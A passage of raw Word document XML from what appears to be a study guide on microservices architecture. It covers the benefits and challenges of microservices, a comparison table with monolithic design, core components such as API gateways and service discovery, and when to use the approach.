    </w:p>
    <w:p w14:paraId="7DA8B6F6"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Better Alignment with Organizational Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7FFB58"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Microservices allow teams to align with business functions. Each team can own and maintain a particular service, allowing for greater ownership and focus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DA4219"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1ED5E93E">
          <v:rect id="_x0000_i2876" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24269ED6"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Challenges of Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A844D7"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omplexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A65E8C9"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While microservices decompose a system into smaller pieces, this can also lead to increased complexity in terms of managing multiple services, communication between them, and handling distributed data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A04A73"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Distributed System Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A54F90A"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Handling a distributed system comes with challenges such as network latency, message serialization/deserialization, and service discovery. Debugging and tracing across services can also be difficult.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E2D79C"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Data Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617679D9"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Managing data consistency across services becomes more challenging. Since each service has its own database, maintaining data consistency and handling transactions can be more complex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eventual consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>saga patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are often used to address this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192D758B"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Deployment Overhead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000304B5"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The deployment of multiple microservices can require complex orchestration. Managing and monitoring a large number of services can be cumbersome, and it requires tools like Kubernetes, Docker, and service mesh systems like Istio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED83181"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Network Overhead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EFD99D"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Communication between microservices happens over a network, which can introduce latency. Also, managing network traffic and ensuring security between services requires additional configuration and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7C22BC"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lastRenderedPageBreak/>
        <w:t>Testing Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574D3517"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Testing microservices requires testing not only individual services but also how they interact with each other. This requires proper </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>contract testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>end-to-end testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FA8AAF"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0F61A4E0">
          <v:rect id="_x0000_i2877" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A73D21"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Microservices vs Monolithic Architectur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6"/>
        <w:gridCol w:w="4086"/>
        <w:gridCol w:w="4004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="1B91A123" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37E107DC"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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EF759EA"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Monolithic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02413B6E"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Microservices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="6C04FDDA" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CDF7BB5"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Structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64999DE0"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Single large codebase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="744A9362"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Multiple small, independent services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="430FB373" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="168B79BA"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Scalability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FC98CD7"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Scaling involves scaling the entire application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="722CFDC0"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Scale services independently based on need</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="79051A3E" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C6410A1"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Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35DEBFC3"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One deployable unit (e.g., a JAR file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D6F7C6C"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Multiple deployable units (e.g., containers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="24759EB6" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53CCA2A6"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Fault Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C88AA52"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Failure in one part affects the whole system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51FAFAD5"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Failures are isolated to specific services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="0E006C52" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F568415"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Technology Stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4515FCE9"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Typically uniform (e.g., Java or .NET)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="779443F8"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Can use different tech stacks per service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="75A432A0" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41483691"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Maintenance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A623C09"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More complex as the codebase grows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75A5D333"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Easier to maintain as each service is smaller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="649AF4A4" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="373721EE"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ommunication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="591D8066"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Direct method calls between components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BD3BA32"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Network calls (HTTP, gRPC, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312742" w:rsidRPr="00FA65E9" w14:paraId="1CCB3710" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27A827AC"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Development Speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7906C121"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Slower as the system grows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="132C126A"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Faster, since teams can work independently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B0C3063"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2FFEE571">
          <v:rect id="_x0000_i2878" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA91C0E"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Components of Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA639FA"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API Gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730AED14"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An API Gateway is used as an entry point for client applications to access the microservices. It handles routing, load balancing, security, and sometimes even request/response transformation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0536207D"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Service Registry and Discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08891795"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Services register themselves with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service registry</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eureka</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consul</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), and other services can discover them using their registered name. This is especially useful when services are dynamically scaling up or down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A5D23"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Load Balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB3CF6C"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Load balancing ensures that requests are distributed across available instances of microservices. This can be achieved using tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Zuul</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Spring Cloud Load Balancer</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C29358D"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Inter-Service Communication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F861D3"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Services communicate with each other using protocols like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESTful APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gRPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or message brokers like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka</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RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for asynchronous communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACDC260"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Database per Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A6DE34"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Each microservice typically has its own database, allowing it to manage its data independently. This avoids issues with sharing a common database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A73826"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Monitoring and Logging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2821D9AE"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Microservices require a robust monitoring and logging system to ensure that each service's health is tracked and any issues are quickly identified. Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ELK stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Elasticsearch, Logstash, Kibana) are commonly used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A8B3D1"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Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240716F8"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Security is an important aspect of microservices. Each service should authenticate requests, and an </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OAuth 2.0</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JWT</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> token-based system can be used for securing APIs. An API Gateway can be used to centralize authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F08EADB"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60B4DF24">
          <v:rect id="_x0000_i2879" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5426A754"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When to Use Microservices Architecture?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EE1E33"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Large Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F097ED0"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When building a large and complex system that needs to scale, microservices allow individual parts of the system to be scaled independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A52EE2B"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Frequent Releases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A87C428"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If your organization requires frequent releases and independent deployments for different parts of the system, microservices provide the agility needed for continuous delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057D18E3"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Team Autonomy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B307496"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When you have a large team or several teams working on different business domains, microservices help in giving each team ownership of a specific service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF57A33"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Evolving Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705E0351"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When a system is likely to evolve over time (e.g., adding new features or adopting new technologies), microservices provide flexibility and modularity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B21FF4"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15E13FAC">
          <v:rect id="_x0000_i2880" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0980B247"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29441115"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lastRenderedPageBreak/>
        <w:t>Microservices architecture provides significant benefits in terms of scalability, flexibility, and independent development of services. However, it also comes with challenges related to complexity, data management, and network overhead. It's best suited for large-scale, distributed applications with a need for independent scaling, continuous delivery, and rapid development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ADC167" w14:textId="2BA3E047" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00115965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="707DF81A">
          <v:rect id="_x0000_i2881" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4387FA93" w14:textId="5749BFE8" w:rsidR="001659D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="690" w:name="_Toc196308170"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where are you deploying your microservice</w:t>
      </w:r>
      <w:r w:rsidR="001659D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="690"/>
    </w:p>
    <w:p w14:paraId="7A5EFB25" w14:textId="5F86A2C4" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742" w:rsidP="00FA65E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
